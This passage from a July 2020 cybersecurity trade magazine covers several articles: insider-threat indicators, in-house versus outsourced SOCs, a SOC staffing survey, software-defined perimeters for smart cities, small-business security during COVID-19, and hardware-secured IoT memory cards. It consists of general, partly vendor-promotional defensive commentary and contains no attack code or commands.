<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 46<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
to prioritize higher-risk employees. In this regard, non-technical indicators help programs to get ahead of<br />
insider threat problems, rather than simply react to them.<br />
Using Non-Technical Risk Indicators<br />
Non-technical indicators are available within most company systems. For example, human resource<br />
information systems will contain data about promotions, demotions, suspensions, performance ratings,<br />
training records and previous employers. Security information systems may have records of violations,<br />
anomalous attempts to gain access to unauthorized areas and, in the case of the defense and aerospace<br />
industry, security-clearance denials.<br />
Facilitating the identification and reporting of additional kinds of non-technical behaviors can be more<br />
challenging. For example, ‘See Something, Say Something” programs have limited utility for multiple<br />
reasons. First, co-workers often do not consciously recognize the indicators until they are significant or<br />
until something bad happens. Second, if they do recognize a concern, they rarely report it because they<br />
do not see it as significant, or they do not want to get someone they like in trouble.<br />
To overcome these challenges, insider threat programs need to repeatedly communicate that the goal of<br />
the program is to mitigate risks in a proactive and positive manner, helping employees while protecting<br />
company assets. As this goal is accomplished, stakeholders, supervisors and employees will take notice,<br />
which will increase compliance and participation in the reporting program.<br />
Next, insider threat programs need to facilitate the reporting of anomalous activity by supervisors. This<br />
can be accomplished via direct conversations, indirectly through human resources or by using surveys.<br />
The results of this reporting should then inform the insider threat program threat detection capability.<br />
Temporal Analysis<br />
The importance of integrating and analyzing indicators over time cannot be overstated. Let’s consider a<br />
fictitious scenario where there are non-technical behavioral indicators that increase the threat level of an<br />
employee:<br />
Jolene has been with her company for three years. Initially she was a good performer but that has<br />
changed over the past two years. She has grown increasingly unhappy with her job as a database<br />
administrator and her personal life is in shambles. She finds her role trivial and she feels the<br />
company is not treating her fairly compared to others, which she has expressed to human<br />
resources. She applied for a position in another department but was not selected, which made<br />
her even more angry and frustrated. She has access to mission-critical systems with authorization<br />
to create and destroy databases, tables and records. Her supervisor works from another office<br />
location, and does not meet with her more than once every two weeks. Outside of work, Jolene<br />
barely has enough money to pay rent for a two-bedroom apartment since her boyfriend left town.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 47<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Moreover, she recently wrecked her truck and her cat is sick again. She is not sleeping well and<br />
has turned to drugs and alcohol.<br />
Jolene has moved far along the critical path to insider risk. She has multiple stressors, exhibits concerning<br />
behaviors and has experienced problematic organizational responses. And she has access to critical<br />
company systems.<br />
It would be wise to fully evaluate then mitigate any risk that Jolene presents, with the goal of protecting<br />
company assets and assisting a struggling employee. Yet very few companies have the capability to<br />
assemble and analyze this non-technical information to effectively identify when an insider like Jolene is<br />
on the path to insider risk. Assessing employees’ private lives through background or credit checks or<br />
other measures is not even necessary in most cases; many other indicators are already collected by the<br />
organization and readily available.<br />
The inadequate use of non-technical indicators might be due to the fact that many insider threat programs<br />
grow out of existing cyber security programs using management tools such as UEBA and SIEM, which<br />
were developed to evaluate large volumes of technical data using rules and machine learning to identify<br />
technical behavioral anomalies.<br />
As discussed above, when looking at insider threats as caused by known humans, these technical<br />
indicators are perhaps one-third of the picture. Risk-scoring models built solely around technical<br />
indicators are not designed to put the anomalies that they detect into the broader context of the critical<br />
path to insider risk. These models can only be effective if they add non-technical behavioral indicators to<br />
the analytical mix.<br />
Multi-Disciplinary Technology Platforms for Evaluating Insider Threats<br />
Insider threat programs should consist of diverse experts representing human resources, legal,<br />
information security, cybersecurity, information technology, physical security, behavioral science and<br />
counterintelligence. These disciplines bring data and perspective when evaluating insider threats. They<br />
weigh evidence and give opinions on whether the behavior is indicative of a threat.<br />
The problem is that this approach does not scale well in organizations with large numbers of employees,<br />
since no team of experts could keep up.<br />
But the experts can share their judgments and wisdom in analytic tools that apply complex reasoning that<br />
goes into contextualized analysis of insider threats. For this approach, Bayesian inference networks are<br />
an ideal solution.<br />
Bayesian networks can be built to probabilistically model expert reasoning across multiple domains using<br />
the full range of technical and non-technical behavioral indicators of insider risk. The result is a vastly<br />
improved capability to identify high-risk insiders that have committed threat activities, as well as those<br />
who are on the Critical Path to potentially commit them in the future. The probabilistic model enables the<br />
desired proactive response necessary to protect company assets, including the insiders themselves.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 48<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
About the Author<br />
David Sanders is Director of Insider Threat Operations at Haystax, a<br />
business unit of Fishtech Group. Previously, he designed and managed<br />
the insider threat program at Harris Corporation, now L3Harris<br />
Technologies. David also served on the U.S. government’s National<br />
Insider Threat Task Force (NITTF). David can be reached online at<br />
(dsanders@haystax.com or https://www.linkedin.com/in/david-sandershaystax/)<br />
and at our company website http://www.haystax.com/<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 49<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Benefits of A Security Operation Center (SOC)<br />
By Pedro Tavares, Editor-in-Chief seguranca-informatica.pt<br />
The creation of a Security Operations Ce nter (SOC) has increasingly stood out as something necessary<br />
to help companies defend themselves against damage caused by cyber-attacks. SOC is considered the<br />
kernel of an organization's security operations, the purpose of which is to provide detection and response<br />
services to security incidents.<br />
The creation of a SOC from-scratch involves a large investment in human and technological resources,<br />
especially when it is intended to maintain operations on a full-scale 24×7. Implementing a SOC solution<br />
goes far beyond buying technologies and putting it into operation. First, there is a great shortage of<br />
qualified professionals which makes it a real challenge to bring them into your organization. From a<br />
technological perspective, the right equipment and the right platforms can help you automate or at least<br />
optimize your incident detection and response capabilities. How to decide the best option: Implement or<br />
Hire a SOC? The answer is not simple.<br />
Create your own SOC or Hire a third-party SOC<br />
One of the advantages of creating your own SOC is having a team exclusively dedicated to achieving<br />
your goals. This team will have a deep understanding of the business. They will better understand the<br />
general context around events and have more knowledge about how you operate in contrast to a third<br />
party SOC.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 50<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
On the other hand, buying a SOC solution can be cost-effective. You may not need to buy software or<br />
equipment directly, and you won't have to hire or manage the team full time. Managed Security Service<br />
Provider (MSSP) will take care of everything for you - from the integrity of the infrastructure to triage and<br />
incident response. Since obtaining technology and personnel costs will not a preoccupation for you, the<br />
total investment value may end up being much lower.<br />
How to choose the best option<br />
The responses are not linear, but some questions can help you to make the final judgment.<br />
●<br />
●<br />
●<br />
●<br />
●<br />
How do security and SOC align with the business strategy and mission?<br />
Do you intend to operate on a 24 × 7 scale?<br />
Are the investments involved justified?<br />
Does your business need greater control by demanding its own SOC?<br />
What would happen to your business if it suffered a security breach?<br />
When considering the last question, if the impact is minimal, it is suggested to hire a SOC solution. If the<br />
impact is quite significant, then I advise you to develop your own SOC solution.<br />
Developing a SOC can be very costly if not done in the right way. Some mistakes can even compromise<br />
your business goals and objectives. The lack of experienced professionals in the market definitely makes<br />
managing your own SOC a little more challenging - the demand is huge and your partners and<br />
competitors looking for the same resources as you.<br />
In sum, the challenge of implementing a SOC in your organization is enormous, but the benefits are<br />
notorious.<br />
Continuous Protection: Having a command center that monitors your network and/or facility 24/7.<br />
Timely Response: The gap between critical event and response time narrows.<br />
Help Customers/Stakeholders Feel Secure: A security command center can serve external and<br />
internal marketing purposes as well.<br />
Simplify Investigations: Capabilities of a security operations center on hand can expedite the process<br />
of analysis.<br />
And last but not least, a SOC solution can provide insight on identifying threats before they become<br />
critical events.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 51<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
About the Author<br />
Pedro Tavares is a cybersecurity professional and a<br />
founding member of CSIRT.UBI and Editor-in-Chief of<br />
seguranca-informatica.pt.<br />
In recent years he has invested in the field of information<br />
security, exploring and analyzing a wide range of topics,<br />
malware, ethical hacking (OSCP-certified), cybersecurity,<br />
IoT and security in computer networks. He is also a Freelance Writer.<br />
Segurança Informática blog: www.seguranca-informatica.pt<br />
LinkedIn: https://www.linkedin.com/in/sirpedrotavares<br />
Twitter: https://twitter.com/sirpedrotavares<br />
Contact me: ptavares@seguranca-informatica.pt<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 52<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
In <strong>2020</strong>, SOCs Are Understaffed Yet Overconfident in<br />
Ability to Detect <strong>Cyber</strong>threats<br />
Exabeam’s ‘<strong>2020</strong> State of the SOC Report’ offers peer-to-peer SOC comparisons<br />
By Steve Moore, chief security strategist, and Samantha Humphries, senior product marketing<br />
manager, Exabeam<br />
Security operations centers (SOCs) are on the frontlines in protecting businesses and government<br />
agencies against cyberthreats and attacks. Therefore, whether the organization has an in-house or<br />
outsourced SOC, it’s critical to gauge the effectiveness, given the importance it plays in the overall<br />
cybersecurity posture.<br />
Exabeam’s <strong>2020</strong> State of the SOC Report allows organizations to compare their SOCs to those of their<br />
peers around the globe and determine common pitfalls, priorities and ways to improve technology,<br />
staffing, employee happiness and more. Highlights include:<br />
This report is the Exabeam’s third annual comprehensive survey of cybersecurity professionals who<br />
manage and operate SOCs. Respondents include CISOs, CIOs, frontline security analysts, and security<br />
managers from the U.S., U.K., Canada, Germany, and Australia. The report covers a wide range of<br />
topics including basic SOC operations, hiring and staffing, operational processes, technology and finance<br />
and budget.<br />
Key findings include that SOC leaders and analysts are confident in their ability to detect common security<br />
threats but do not agree on the threats. In addition, SOC leaders and frontline analysts do not agree on<br />
the most common threats facing the organization. SOC leaders believe that phishing and supply chain<br />
vulnerabilities are more important issues, while analysts see DDoS attacks and ransomware as greater<br />
threats.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 53<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
However, threat hunting and the ability to remediate threats effectively stand out as critical skills that SOC<br />
personnel feel they lack. This gap may indicate that SOCs are overconfident in their ability to detect a full<br />
range of security threats.<br />
Figure 1: Eighty-two percent of SOC professionals are confident in their ability to detect threats.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 54<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Figure 2: SOC leaders believe that phishing and supply chain vulnerabilities are more important issues,<br />
while analysts see DDoS attacks and ransomware as greater threats.<br />
In last year’s report, respondents cited personal and social skills as the most critical soft skill for SOC<br />
employees. This year, however, 62% of respondents noted the ability to work in teams as the most<br />
important soft skill.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 55<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Figure 3: While hard skills remain critical, SOCs place emphasis on soft skills with the ability to work in<br />
teams taking precedence over formerly reported social ability.<br />
The importance placed on teaming is an indication that SOC staff need to work in cohesive teams and<br />
often with staff from other teams. SOC members that work as a team are more apt to document processes<br />
to standardize tasks and train new employees, which is helpful both as teams grow or are reassigned.<br />
Members of a SOC should not only improve teaming among their group, but also proactively strengthen<br />
their working relationship with other functional groups, including IT operations, NOC staff, and<br />
increasingly, DevOps. Working with these other groups helps to improve response time. More important,<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 56<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
it will create a team that is responsive and able to adapt as the work environment shifts due to challenges<br />
like working with a distributed workforce and ensuring the right collaboration and communications tools<br />
and culture are in place.<br />
The report also reveals a significant decline in the ability to do threat modeling in both the U.S. and U.K.<br />
SOCs. Threat modeling is the systematic approach to identifying and prioritizing potential security threats<br />
and designing countermeasures to prevent them. The data suggests threat modeling doesn’t have an<br />
agreed upon standard, and most analysts perform it infrequently or not at all.<br />
Additionally, the ability to conduct incident analysis and budget and resource allocation for both countries<br />
have declined from the previous year.<br />
Figure 4: U.S. and U.K. SOCs reported significant declines in their ability to do threat modeling, incident<br />
analysis and budget/resource allocation in YoY change.<br />
The findings also show that when asked to rate pain points, inexperienced staff and time spent on<br />
reporting/documentation were common issues for managers and frontline employees but not for<br />
executives.<br />
Lending credence again to the statement, “you can’t protect what you can’t see,” senior leaders noted<br />
that the lack of visibility and not having a good list of assets were their most significant pain points.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 57<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Figure 5: Inexperienced staff and too much time spent on reporting and documentation continue to be<br />
pain points for SOCs in <strong>2020</strong>.<br />
Traditionally, SOC teams have generally been responsible for two primary responsibilities — investigating<br />
suspicious activities and maintaining security tools. But over the years, the responsibilities of the SOC<br />
has increased to include other duties such as defining security metrics and incident response. Our report<br />
finds that staff at all levels share these responsibilities. However, there are a couple of differences.<br />
CIOs and CISOs rank their responsibility for operations management as well as policy and procedure<br />
development highest. They also share other responsibilities with managers and frontline employees,<br />
including defining security objectives and metrics and incident response. Not surprisingly, maintaining<br />
security monitoring tools was noted as a critical responsibility for frontline employees.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 58<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Figure 6: SOC managers drive metrics specifically in operations and management and procedure and<br />
policy development.<br />
Download the complete report to learn other points of interest that can help measure the effectiveness<br />
of your SOC and support you in your ongoing efforts to protect your organization.<br />
About the Author<br />
Samantha Humphries<br />
Senior Product Marketing Manager<br />
Samantha has 20 years of experience in cyber security. She has<br />
defined strategy for multiple security products and technologies,<br />
helped hundreds of organisations of all shapes, sizes, and<br />
geographies recover and learn from cyberattacks, and trained<br />
anyone who’ll listen on security concepts and solutions. She<br />
authors articles for various security publications, and is a regular<br />
speaker and volunteer at industry events, including BSides,<br />
IPExpo, <strong>Cyber</strong>SecurityX, The Diana Initiative, and Blue Team<br />
Village (DEFCON)."<br />
Stephen Moore<br />
Chief Security Strategist<br />
Steve Moore is Vice President and Chief Security Strategist at<br />
Exabeam, helping drive solutions for threat detection and<br />
advising customers on security programs and breach response.<br />
He is the host of the “The New CISO Podcast” and a Forbes<br />
Tech Council member. Prior to Exabeam, Moore served as Staff<br />
VP of <strong>Cyber</strong>security Analytics at Anthem, a Fortune 30<br />
healthcare company. Moore’s experience includes leading the<br />
investigation of state sponsored cyberespionage campaigns,<br />
breach response, associated legal depositions, and client<br />
management. He’s passionate about cybersecurity, teamwork and leadership excellence.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 59<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Software-Defined Perimeters Offer Secure Connectivity<br />
to Smart Cities<br />
By Don Boxley, CEO and Co-Founder, DH2i (www.dh2i.com)<br />
Smart cities are on the rise—in a really big way. According to Microsoft, smart-city initiatives—which can<br />
be defined as cities that rely on Internet of Things (IoT) sensors to obtain data that’s then mined to guide<br />
management of city services and resources—account for nearly a quarter (23 percent) of the world’s IoT<br />
projects.<br />
As the number of smart cities mushrooms, these hyperconnected urban areas are becoming increasingly<br />
critical to how seamlessly cities are able to operate. This is an important point to grasp, since cities serve<br />
as the linchpin for most of the world’s data generation, as well as the majority of all energy consumption.<br />
What’s more, most of us live in cities. The UN reports that just over half (55 percent) of the world’s<br />
population makes a city their home—a figure that the UN predicts will rise significantly (close to 70<br />
percent) in the next 30 years.<br />
Here are some additional stats to impress upon you the importance of our urban areas in general, and<br />
smart city growth in particular:<br />
• Forbes reports that by 2025, we’ll be looking at approximately 80 billion devices that are smart<br />
devices.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 60<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
• By then, our global cities may be cranking out up to 180 zettabytes of data.<br />
• In terms of energy production, The World Bank reports that our urban meccas already gobble up<br />
to 80 percent of its worldwide.<br />
• Over the next decade, cities will likely be responsible for close to three-quarters (74 percent) of<br />
global greenhouse gases, up from around two-thirds, or 67 percent, currently.<br />
Adding Predictability with Smart Edge Devices<br />
It can feel overwhelming to consider the vast scope of the challenges that face today’s cities. Cities are<br />
charged with managing an ever-expanding laundry list of problems, including transportation, water and<br />
energy, public health, infrastructure, public safety, waste reduction, and more. As the current global<br />
pandemic and COVID-19 are showing, the high population and density of cities can quickly turn them<br />
into a hotbed of issues that require the best that technology can offer to aid communication and mitigate<br />
complexities.<br />
To that end, studies have proven the value of edge computing and smart IoT edge devices, particularly<br />
when it comes to smart cities. A comprehensive survey on “Edge Computing Enabled Smart Cities” by<br />
Khan et al for the Institute of Electrical and Electronics Engineers (IEEE) stated that “it is evident from<br />
literature that IoT is an integral part of smart cities. The next step is enabling the resource intensive and<br />
strict latency IoT based smart city applications. Edge computing provides a promising way of enabling<br />
these applications by offering computation and storage resources with low latency.”<br />
However, metropolises still have a significant issue to figure out—security—when leveraging the power<br />
of edge computing in smart cities. How can our global municipalities offer secure connectivity from their<br />
datacenters (as well as from the cloud) to the edge? The answer lies in the secure environment provided<br />
by software-defined perimeter (SDP) technology.<br />
Safeguarding the Edge<br />
SDP software provides the needed security for smart IoT edge devices by creating a “zero trust”<br />
environment. This means edge devices don’t have full network access, but instead can only access the<br />
exact applications that the city’s IT department has authorized them to see, whether in the cloud or<br />
datacenter.<br />
In other words, SDP allows for access at the application level only, not at the network level. As a result,<br />
lateral attacks are no longer a thing, and smart cities can enjoy the “secure by default” architecture that<br />
they require.<br />
Here’s how SDP solutions work to help create secure, hyperconnected smart cities:<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 61<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
• SDP software allows for data transfer, by way of encrypted micro-tunnels, right from smart IoT<br />
edge devices to various destinations—whether an on-premises site, multi-cloud, or hybrid-cloud<br />
setting.<br />
• To ensure secure connectivity and transmission, SDP also uses public key authentication.<br />
• Specific types of SDP software make this happen through an enhanced user datagram protocol<br />
(UDP), which has randomly generated ports that render the tunnels basically invisible to<br />
cybercrooks.<br />
Other benefits for city IT staff include that SDP offers easy configuration and management, which aids<br />
scalability. The software requires no appliances, and also avoids the various maintenance and security<br />
challenges of VPNs, which were designed for a physical-server environment. SDP has performance<br />
advantages as well, with the encrypted micro-tunnels offering the ability to be made highly available.<br />
Smart devices and edge computing has proven ability to help smart cities advance and problem-solve—<br />
but without secure connectivity, these measures fall short. By pairing an SDP client with smart devices,<br />
those who are working on creating the hyperconnected smart cities that will take us into the future can<br />
safeguard their investment of time, resources, and data as well.<br />
About the author<br />
Don Boxley Jr is a DH2i co-founder and CEO. Prior to DH2i, Don spent<br />
more than 20 years in management positions for leading technology<br />
companies, including Hewlett-Packard, CoCreate Software, Iomega,<br />
TapeWorks Data Storage Systems and Colorado Memory Systems. Don<br />
earned his MBA from the Johnson School of Management, Cornell<br />
University.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 62<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Managing Small Business <strong>Cyber</strong>security During Covid-19<br />
By Bill DeLisi, CEO of GOFBA<br />
Small businesses are undertaking extraordinary changes during the coronavirus epidemic. They’re<br />
laying off staff, shifting their business models, and managing the challenges of remote work. The pace<br />
of the stay-at-home orders and the abrupt halt of the economy required small businesses to move<br />
quickly. States are in the midst of gradually reopening, but many smaller firms will continue to face<br />
impactful challenges for the rest of the year and beyond. In addition to the safety and health issue<br />
concerns, small firms are also facing cybersecurity risks.<br />
Compared to enterprise-level firms, small businesses do not possess massive IT budgets to confront<br />
threats. Large firms have capital to weather business interruptions that might come from data breaches.<br />
Small businesses are already devastated during COVID-19, they can’t risk losing data and being offline<br />
for even a day. And there’s the PR hit that comes with a data breach event. A small firm cannot likely<br />
survive a breach, especially in the current economy where competition for dollars is at a premium.<br />
Unfortunately, there’s many bad actors out there. <strong>Cyber</strong>security hacking attempts are rising during the<br />
COVID-19 pandemic, as hackers prey on fear and uncertainty. To that end, here are three of the most<br />
persistent and damaging COVID-19 driven security threats for small business, along with some tips for<br />
mitigating the risks.<br />
1. Stop Malware in its Tracks<br />
Malware encompasses spyware, viruses, trojans, and other tools hackers use to infect computers. The<br />
actual programs live on attachments and within software such as PDF viewers. Staff members must avoid<br />
downloading unapproved programs and understand the types of actions that can lead to malware.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 63<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
The COVID-19 outbreak offers opportunity for hackers. For example, there’s malware embedded in some<br />
live maps of the virus’ spread. COVID-19 themed malware that wipes a computer clean is also circulating.<br />
Firewalls and anti-malware programs are a first line of defense for small businesses. These programs<br />
must use automatic updating for maximum protection so they can detect the latest threats.<br />
Workers now operating from home are exposing their company’s data and networks. They’re using home<br />
Wi-Fi, and many are searching on non-approved or dangerous websites. Restricting search for remote<br />
workers is tricky but is possible through a secure search engine such as GOFBA. This platform limits<br />
malware by stopping users from reaching suspicious sites, while still allowing them to access information<br />
that pertains to their jobs. Small business staff should also limit their information gathering about the<br />
COVID-19 epidemic to established news and health organization sites. Unknown sites filled with<br />
information about pandemic “cures” or various conspiracy theories and other content are likely filled with<br />
malware.<br />
2. Prevent Phishing<br />
Phishing schemes are simple. A hacker creates a formal-looking email and sends it out to a large group<br />
of recipients. Their goal is for someone to open the email and either click a link or download an<br />
attachment. That simple action then launches malware which infects the person’s computer and the<br />
linked company network. The hacker then controls the firm’s data, encrypts it, and holds it for ransom.<br />
The pandemic provides ample material for phishing schemes. Emails touting fake COVID-19 tests or<br />
miracle cures prey on people’s fear about the virus. Other emails pushing for donations to charities prey<br />
on people’s willingness to help, while directing money to fraudulent accounts. Many phishing emails<br />
mimic communications from local government agencies or the CDC, with official-sounding messages<br />
about pandemic news or recommended actions.<br />
Small businesses workers must read about the dangers of such emails, and how to recognize fake and<br />
dangerous communications. The typical phishing email gives itself away with some clues:<br />
• Amateurish design with outdated graphics and feel<br />
• Unprofessional-sounding content with misspellings<br />
• Odd URLs that do not match the company/organization (users can hover their mouse on links to<br />
see the destination address)<br />
• The email asks the recipient to confirm personal information, such as “Enter your SSN to see if<br />
you qualify for free COVID-19 testing”<br />
• Messages that play on panic and suggest urgent action are very often phishing schemes<br />
Remote employees need a better understanding about phishing emails and should err on the side of<br />
caution before clicking any links or attachments. Remind the employees that deleting the email is the<br />
safest move.<br />
3. Properly Manage BYOD<br />
With a massive move towards remote work comes the need for laptops and phones to connect to work.<br />
Some firms provide employees with devices. Others use a BYOD, or “Bring Your Own Device” policy that<br />
allows employees to utilize their personal device to access work software.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 64<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
There are multiple risks when employees use their own devices for work. Since they’re at home and<br />
comfortable with their phone and laptop, many users will engage in riskier searches and look at sites<br />
they’d never consider at the workplace. These sites increase exposure to malware, which then puts the<br />
connected company networks at risk.<br />
Small businesses must take the time to implement personal device policies. This includes detailing how<br />
employees are accessing and storing company data. For example, are staff saving information to their<br />
laptops? Are they using unsecured cloud storage through Google or Dropbox instead of the corporate<br />
cloud? Do employees use strong two-factor passwords? What happens with data access when a remote<br />
worker leaves a company? A formal plan is essential for protecting both the company and the employees.<br />
Companies must strike a balance during this work-from-home period. They need to protect their data<br />
through rules and processes while also giving staff enough flexibility to access needed information. There<br />
are also privacy considerations in play. Small business owners must understand the employee’s family<br />
members are also using the home Wi-Fi, so there’s only so much control the owners can exert. A solid<br />
approach for remote workers is to create formal guidelines to include mobile device management<br />
software that automates updates, features virus detection, and gives employees limited control. The key<br />
is transparency. Both the employee and employer are on the same page regarding expectations and<br />
rules. And as the pandemic eases in some areas, business owners must decide if workers can remain at<br />
home, need to come back to offices, or if they will adopt a hybrid approach.<br />
Key Takeaway<br />
During the pandemic, small business owners are pivoting while trying to retain good employees.<br />
<strong>Cyber</strong>security threats are an additional unneeded stressor for already strained companies. Thankfully,<br />
by following guidelines for remote workers and managing risks, firms can reduce the chances of a<br />
cybersecurity event and focus on making it through the crisis.<br />
About the Author<br />
Bill DeLisi is one of the world’s most authoritative experts on<br />
cybersecurity. He is currently the Chief Executive Officer, Chief<br />
Technology Officer and a founding member of the Board of<br />
Directors for GOFBA, Inc. DeLisi has more than 30 years of<br />
experience in the computer industry, including holding the position<br />
of Chief Technology Officer at several companies. He has worked<br />
closely with Microsoft Gold Certified Partners, helping pioneer<br />
“cloud” computing and creating security infrastructures that are still<br />
in use today. DeLisi is responsible for the development of<br />
proprietary technology that serves as the backbone of GOFBA’s<br />
platform and has over 30 certifications with Microsoft, Cisco, Apple,<br />
and others, which includes the coveted Systems Engineer with<br />
Advanced Security certification, as well as expert status in Cloud<br />
Design and Implementation.<br />
Bill Delisi, CEO of GOFBA. Bill can be reached via email at bill@gofba.com or on his company website<br />
www.GOFBA.com.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 65<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
IOT Security Embedded in Memory Cards<br />
AS DEVICES, MACHINERY AND MANUFACTURING PLANTS GET SMARTER, THEY ALSO<br />
BECOME MORE VULNERABLE.<br />
By Hubertus Grobbel, Vice President Security Solutions, Swissbit.<br />
When designing networked devices, machinery and production facilities, developers need to place more<br />
focus on security aspects. Swissbit now offers a flexible, hardware-based approach that includes TPM<br />
(Trusted Platform Module) and data encryption.<br />
For IT- and data-security, systems communicating over the Internet or via their gateways in the IoT<br />
(Internet of Things), need to have a unique and non-cloneable identity. Systems must also be able to<br />
send, receive and store cryptographically and heavily secured data. Solutions involving only the use of<br />
software rarely offer sufficient protection. This presents developers and manufacturers with great<br />
challenges.<br />
Swissbit, the storage and security expert, offers a new hardware-based approach. Developers of<br />
embedded systems for industrial applications know Swissbit as the only independent European<br />
manufacturer of flash memory products. Many see the Swiss company, manufacturing in Germany, as<br />
their top choice for robust, durable SSDs with PCIs and SATA-interfaces, CompactFlash, USB-flash<br />
drives, SD and microSD memory cards and managed NAND BGAs.<br />
Based on decades of experience in the protection of stored data, Swissbit has now developed a new<br />
advanced approach to security for embedded IoT devices. The thought process behind the development<br />
is that every device needs memory to act as a boot medium for log files, and data cache memory in case<br />
of network failures. These memory interfaces can and should have security features.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 66<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Security in memory card format<br />
Swissbit’s new security solution consists of a flash memory chip, produced and tested for industrial<br />
requirements. This chip is run using a special version of the durabit firmware with integrated AES 256-bit<br />
encryptor (Fig. 1). The DP (Data Protection) version encrypts and protects all data in various ways (CD-<br />
ROM mode, PIN protection, hidden memory, WORM mode). For the hardware-based protection of the<br />
communication in the IoT, another security anchor is required. Swissbit’s security modules come with<br />
solutions such as an Infineon/NXP Smart Card Chip CC EAL 5+/6+. An API, a SDK and a PKCS#11<br />
library are available for application development.<br />
Fig 1. The structure of a microSD card with security features.<br />
Designating an ID to things<br />
Security experts trust in microSD cards with secure element for encrypting mobile phone<br />
communications. Similar to the communication between people, the communication of the things across<br />
the Internet also needs to employ identification, authentication and authorization. In other words, how<br />
does a “thing” know that the data or data queries received from another “thing” are correct and that the<br />
source of a message is truly the system component that it claims to be? Swissbit security memory media,<br />
with secure element, provide applications and systems with a unique identity. “Things” get a counterfeitproof<br />
ID and as such, networked systems can be protected from misuse, “identity theft” and data access<br />
can be restricted. Smart cards, that are integrated onto memory cards, provide systems with noncloneable<br />
identities, transforming them into uniquely identifiable M2M (machine-to-machine)<br />
communication participants, that can authenticate themselves and send and receive cryptographically<br />
